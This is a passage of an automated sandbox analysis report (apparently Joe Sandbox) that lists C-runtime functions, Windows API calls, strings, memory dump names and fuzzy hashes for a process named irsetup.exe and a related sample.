Opcode Fuzzy Hash: 628d5342cbd1e67f1f3a3b6805dd6a854c1c623084b3b0db614e7cb17b0d6585
Instruction Fuzzy Hash: AB110A32A1E682C2EA94BB50ED4177AF264FB85740F880035DB2D07795EF2CE850CB20

Function 00007FF746505350 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF746505356

Part of subcall function 00007FF7465035FC: _amsg_exit.LIBCMT ref: 00007FF746503612

_getptd.LIBCMT ref: 00007FF746505376
_lock.LIBCMT ref: 00007FF746505389
_amsg_exit.LIBCMT ref: 00007FF7465053B7

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: _amsg_exit_getptd$_lock
String ID:
API String ID: 3670291111-0
Opcode ID: 91f2677a30e6242cfe2f2c7e8f7ef960797a2fefed02ff18cb049ef4cbc26dd5
Instruction ID: fb433edaad5200a6810a153914ca8f06fd63e29705936bf9898b56059b79ee58
Opcode Fuzzy Hash: 91f2677a30e6242cfe2f2c7e8f7ef960797a2fefed02ff18cb049ef4cbc26dd5
Instruction Fuzzy Hash: FAF0FF21A0E147C5FA587B55DD427FAE261AF49744F880139DA2D0B3D2EE5CE8408730

Analysis Process: irsetup.exePID: 3220, Parent PID: 2548COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	339
Total number of Limit Nodes:	13

Executed Functions

Function 0000000180029E74 Relevance: 10.6, APIs: 7, Instructions: 87
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000018002D374: HeapCreate.KERNEL32(?,?,?,?,0000000180029E89), ref: 000000018002D386
Part of subcall function 000000018002D374: HeapSetInformation.KERNEL32 ref: 000000018002D3B0

_RTC_Initialize.LIBCMT ref: 0000000180029EA4
GetCommandLineA.KERNEL32 ref: 0000000180029EA9

Part of subcall function 0000000180038D00: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D2F
Part of subcall function 0000000180038D00: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D6F

Part of subcall function 000000018002C830: GetStartupInfoA.KERNEL32 ref: 000000018002C855

__setargv.LIBCMT ref: 0000000180029ED2
_cinit.LIBCMT ref: 0000000180029EE6

Part of subcall function 000000018002C178: FlsFree.KERNEL32(?,?,?,?,0000000180029F37), ref: 000000018002C187
Part of subcall function 000000018002C178: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1A6
Part of subcall function 000000018002C178: free.LIBCMT ref: 000000018002D1AF
Part of subcall function 000000018002C178: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1CF

Part of subcall function 000000018002CB20: free.LIBCMT ref: 000000018002CB67

Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D

FlsSetValue.KERNEL32 ref: 0000000180029F6C
GetCurrentThreadId.KERNEL32 ref: 0000000180029F80
free.LIBCMT ref: 0000000180029F8F

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
String ID:
API String ID: 1549890855-0
Opcode ID: a0acf61c1b87e16a772799abe4b62362619cbdfa8acdc2e6844dc3a99a0f0c98
Instruction ID: 5d89b5062d79ddf7cbf42b6751900f03d5044372f9c69ff6a2a4972f2435356c
Opcode Fuzzy Hash: a0acf61c1b87e16a772799abe4b62362619cbdfa8acdc2e6844dc3a99a0f0c98
Instruction Fuzzy Hash: CC315A3060260D85FEE7B7F096423FE13946F5D3D4F22C525B916852E7EE258B8C8322

Function 000000018002E8A4 Relevance: 9.1, APIs: 6, Instructions: 122
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_getptd.LIBCMT ref: 000000018002E8C3

Part of subcall function 000000018002E4E0: _getptd.LIBCMT ref: 000000018002E4EA

Part of subcall function 000000018002E59C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,000000018002E8DE,?,?,?,?,?,000000018002EAB3), ref: 000000018002E5C6

Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

free.LIBCMT ref: 000000018002E94F

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

_lock.LIBCMT ref: 000000018002E987
free.LIBCMT ref: 000000018002EA37
free.LIBCMT ref: 000000018002EA67
_errno.LIBCMT ref: 000000018002EA6C

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
String ID:
API String ID: 2878544890-0
Opcode ID: e82f143c23f227001045ea17cfd9d9e54a22bd3adced516c1c47190338206767
Instruction ID: c776ccf790241ac67246d89d90e9fa713756aa25b18aceaf8fd82d01af155c51
Opcode Fuzzy Hash: e82f143c23f227001045ea17cfd9d9e54a22bd3adced516c1c47190338206767
Instruction Fuzzy Hash: CB51B231600A8886E7E39B65A4403E9B7A1F78ABD8F14C216FA5E473A5CF78D649C701

Function 000000018002D374 Relevance: 3.0, APIs: 2, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(?,?,?,?,0000000180029E89), ref: 000000018002D386
HeapSetInformation.KERNEL32 ref: 000000018002D3B0

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Heap$CreateInformation
String ID:
API String ID: 1774340351-0
Opcode ID: 39044132f5a22a3317da2d95eb259efacad0cdd120c364843a2d6d13d7c05708
Instruction ID: d86c038a14694898d099bceb00610aad7d4d496ac8821e0f5eb4db07846aa6a7
Opcode Fuzzy Hash: 39044132f5a22a3317da2d95eb259efacad0cdd120c364843a2d6d13d7c05708
Instruction Fuzzy Hash: 30E04F75621B84C2F7DAAB21E8457A66290F78C380F909029F94942B94DF7DC2498B00

Function 000000018002BF5C Relevance: 2.5, APIs: 2, Instructions: 30
sleepCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.LIBCMT ref: 000000018002BF7B

Part of subcall function 000000018002D3E0: _FF_MSGBANNER.LIBCMT ref: 000000018002D410
Part of subcall function 000000018002D3E0: HeapAlloc.KERNEL32(?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5), ref: 000000018002D435
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D459
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D464

Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$AllocHeapSleepmalloc
String ID:
API String ID: 496785850-0
Opcode ID: c64cacc54551c1d413d26b4b77fca54a5991493b7637ea44cfe571c06a399083
Instruction ID: ccdb5c5ed8c45f556dc77aec0225093e2b7ac281c4f631198e9e49a815c37d6e
Opcode Fuzzy Hash: c64cacc54551c1d413d26b4b77fca54a5991493b7637ea44cfe571c06a399083
Instruction Fuzzy Hash: 31F0FC32205A8C82E6D79F26E58036EB360F78CBD4F558124FA5D03795CF38CA958F00

Function 00000001800034F0 Relevance: 1.3, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.LIBCMT ref: 00000001800034FF

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorFreeHeapLast_errnofree
String ID:
API String ID: 3856698052-0
Opcode ID: 2acc962203dc7ae12ea3bb038dd3365208552806d81bcc30d1bb0bb085e2326a
Instruction ID: 24eefc2905acafd760541be8a1a1f06bbdc94ff17dd78c782732821f245c605b
Opcode Fuzzy Hash: 2acc962203dc7ae12ea3bb038dd3365208552806d81bcc30d1bb0bb085e2326a
Instruction Fuzzy Hash: 00C08C94F52F0E82DDAEE2A308D27F800C107AFBC0D80C420F80A8A380DC1CC3AB0B00

Non-executed Functions

Function 0000000180020C38 Relevance: 54.7, APIs: 26, Strings: 5, Instructions: 493COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180020C78

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180020CAA

Strings

COMSPEC, xrefs: 0000000180020EAE
w, xrefs: 0000000180020DA0
PATH, xrefs: 00000001800210D3
/c , xrefs: 0000000180020F86, 0000000180020FD6
cmd.exe, xrefs: 0000000180020EEF

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID: /c $COMSPEC$PATH$cmd.exe$w
API String ID: 2310398763-3679458415
Opcode ID: 500590a71f3528d87d2e0ac02872d3b0dafdd78488768c422d5b14c18cecb6bd
Instruction ID: 9f0d6bfb52196638ce6bad66fd6574380d9c8f482639ba9c857dbbd3f1092ba9
Opcode Fuzzy Hash: 500590a71f3528d87d2e0ac02872d3b0dafdd78488768c422d5b14c18cecb6bd
Instruction Fuzzy Hash: 4522B23220478886FBB7DB65A4517EEB391F78D7C4F548125BA8987B96CF38C649CB00

Function 0000000180032638 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 468COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180032689
_errno.LIBCMT ref: 0000000180032690

Strings

U, xrefs: 0000000180032C47

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID: U
API String ID: 921712934-4171548499
Opcode ID: 48a7f9feffc5bfc5e053856909e6f80eec15adabe95c1eaed7459d9126117ee3
Instruction ID: b99c78c3d65ca0191b994378c1241e68cd305618541e39d27e1f96f7d254ba1e
Opcode Fuzzy Hash: 48a7f9feffc5bfc5e053856909e6f80eec15adabe95c1eaed7459d9126117ee3
Instruction Fuzzy Hash: BF12B23221464986EBA38F25E4443EBB7A0F78C7C4F568116FA89477A5DF39C64DCB10

Function 0000000180037DC8 Relevance: 28.9, APIs: 19, Instructions: 377COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037E3A
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037E50
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037EFA
malloc.LIBCMT ref: 0000000180037F6B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037FA2
LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037FC7
LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180038017
malloc.LIBCMT ref: 000000018003806A
LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 00000001800380A4
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 00000001800380E7
free.LIBCMT ref: 00000001800380F8
free.LIBCMT ref: 0000000180038106
LCMapStringA.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180038195
malloc.LIBCMT ref: 0000000180038203
LCMapStringA.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 000000018003824C
free.LIBCMT ref: 0000000180038294
LCMapStringA.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 00000001800382B4
free.LIBCMT ref: 00000001800382C6
free.LIBCMT ref: 00000001800382D8

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: String$free$ByteCharMultiWidemalloc$ErrorLast
String ID:
API String ID: 1837315383-0
Opcode ID: cacc80e21e0b7faa225b9fdaf443091b09f2c2604889e9d2f947d49bd1adc46f
Instruction ID: a7cd305ef16002d982a5c2a4af8f81cce234251d115d984bdccc4e66b87c68b2
Opcode Fuzzy Hash: cacc80e21e0b7faa225b9fdaf443091b09f2c2604889e9d2f947d49bd1adc46f
Instruction Fuzzy Hash: D8F19F32200B888AE7A78F25D4407DA77A1FB4CBE8F568615FA5957BD4DF38CB498700

Function 00000001800352F8 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003532B

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018003536A
_errno.LIBCMT ref: 000000018003537A
_errno.LIBCMT ref: 000000018003539F
_errno.LIBCMT ref: 00000001800355AA
_errno.LIBCMT ref: 00000001800355B4
free.LIBCMT ref: 00000001800355C4
free.LIBCMT ref: 00000001800355D3

Strings

PATH, xrefs: 00000001800353C3

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$free$DecodePointer
String ID: PATH
API String ID: 3098740396-1036084923
Opcode ID: 7f8aa0d2bc419b7ac494ea42fc3385d60b1a286c2162d3fafcbbe687e9060918
Instruction ID: 9a3c46973cae5f37c669a60ded91cf3780b69c90c913b2de57871a32441f2394
Opcode Fuzzy Hash: 7f8aa0d2bc419b7ac494ea42fc3385d60b1a286c2162d3fafcbbe687e9060918
Instruction Fuzzy Hash: 0C711631201A8841FBE3AA2195617FF2382AB8D7D9F45C522FE9A077D6DE38C74D8701

Function 000000018003029C Relevance: 18.2, APIs: 12, Instructions: 211COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00000001800302CD
_errno.LIBCMT ref: 00000001800302D4

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

__doserrno.LIBCMT ref: 0000000180030313
_errno.LIBCMT ref: 000000018003031A

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno$DecodePointer
String ID:
API String ID: 3911551546-0
Opcode ID: 552b4b0fef55a77f0b16bb130acd12287ff159c4b9a0ed71046dbff09db99d99
Instruction ID: 164ba2cb6b460aa59382b2c1d58f859bc5e2f64025dd1feaf38bdf79f172ba54
Opcode Fuzzy Hash: 552b4b0fef55a77f0b16bb130acd12287ff159c4b9a0ed71046dbff09db99d99
Instruction Fuzzy Hash: D591E232214A8882EB93DF65E4907EF7B61F3887D0F558116FA8907BA5CF78C548CB00

Function 000000018003A8E4 Relevance: 18.1, APIs: 12, Instructions: 115memoryfileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000180039400: _errno.LIBCMT ref: 0000000180039422

_errno.LIBCMT ref: 000000018003A96C

Part of subcall function 0000000180039400: SetFilePointer.KERNEL32(00000000,?,00000001,0000000180032E64,?,00000000,?,00000000,00000000,0000000180032611,?,?,%.14g,000000018002D5DA), ref: 0000000180039442
Part of subcall function 0000000180039400: GetLastError.KERNEL32(?,00000000,?,00000000,00000000,0000000180032611,?,?,%.14g,000000018002D5DA,?,?,00000200,000000018002E089), ref: 0000000180039451

GetProcessHeap.KERNEL32 ref: 000000018003A93E
HeapAlloc.KERNEL32 ref: 000000018003A953
_errno.LIBCMT ref: 000000018003A961
__doserrno.LIBCMT ref: 000000018003A9C6
_errno.LIBCMT ref: 000000018003A9D0
GetProcessHeap.KERNEL32 ref: 000000018003A9E9
HeapFree.KERNEL32 ref: 000000018003A9F7
SetEndOfFile.KERNEL32 ref: 000000018003AA22
_errno.LIBCMT ref: 000000018003AA39
__doserrno.LIBCMT ref: 000000018003AA44
GetLastError.KERNEL32 ref: 000000018003AA4C

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$Heap$ErrorFileLastProcess__doserrno$AllocFreePointer
String ID:
API String ID: 3112900366-0
Opcode ID: 1acf10fccda49597a569ff7a61e3d259f8e1ce3ac393ce0a89e29cdfbef2b00e
Instruction ID: 8eb280900b96f9cb44dac23b3b5a6d05d6d782666a4f137379f29f380706e389
Opcode Fuzzy Hash: 1acf10fccda49597a569ff7a61e3d259f8e1ce3ac393ce0a89e29cdfbef2b00e
Instruction Fuzzy Hash: 2E419F3530495846FAA7AB759D043EE7391A74EBF0F06C712BA79077D2DE38864A8701

Function 000000018003CD74 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 354COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003CE28
__doserrno.LIBCMT ref: 000000018003CE33

Part of subcall function 000000018002649C: _lock.LIBCMT ref: 00000001800264BF
Part of subcall function 000000018002649C: _errno.LIBCMT ref: 00000001800264D1

free.LIBCMT ref: 000000018003CEF5
free.LIBCMT ref: 000000018003CFD4
_errno.LIBCMT ref: 000000018003CFDF
__doserrno.LIBCMT ref: 000000018003CFEA

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

free.LIBCMT ref: 000000018003D212
free.LIBCMT ref: 000000018003D228

Strings

SystemRoot, xrefs: 000000018003CD97
cmd.exe, xrefs: 000000018003CD76, 000000018003CD77

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_errno$ExceptionFilterProcessUnhandled__doserrno$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual_lock
String ID: SystemRoot$cmd.exe
API String ID: 2783816385-1915010242
Opcode ID: f435228b7c99033ebf9bbf731d6440864f99d1bda75eeee7b1c28e628a164daa
Instruction ID: 7d2aedf081fda9467836d831cf405406e94ff08d2ab400320d1a2de9d3ad4fb8
Opcode Fuzzy Hash: f435228b7c99033ebf9bbf731d6440864f99d1bda75eeee7b1c28e628a164daa
Instruction Fuzzy Hash: 44E1D03220568886EBA3DF25E5507EF6791F78DBC4F06C122FA4A97B95CF38C6498701

Function 000000018003779C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00000001800377BE
GetUserDefaultLCID.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 00000001800378BE
IsValidCodePage.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 000000018003790F
IsValidLocale.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 0000000180037925
GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 00000001800379A0
GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 00000001800379BD
_itow_s.LIBCMT ref: 00000001800379DB

Strings

Norwegian-Nynorsk, xrefs: 0000000180037960

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
String ID: Norwegian-Nynorsk
API String ID: 2273835618-461349085
Opcode ID: cd1b9dbfe264d746d2e8f6b4703a042a5d78dbd1592c6507181496ebb6678025
Instruction ID: 761428af2cddcf0ece5004559499aa7377a8e36176df394555f2b51de48901ed
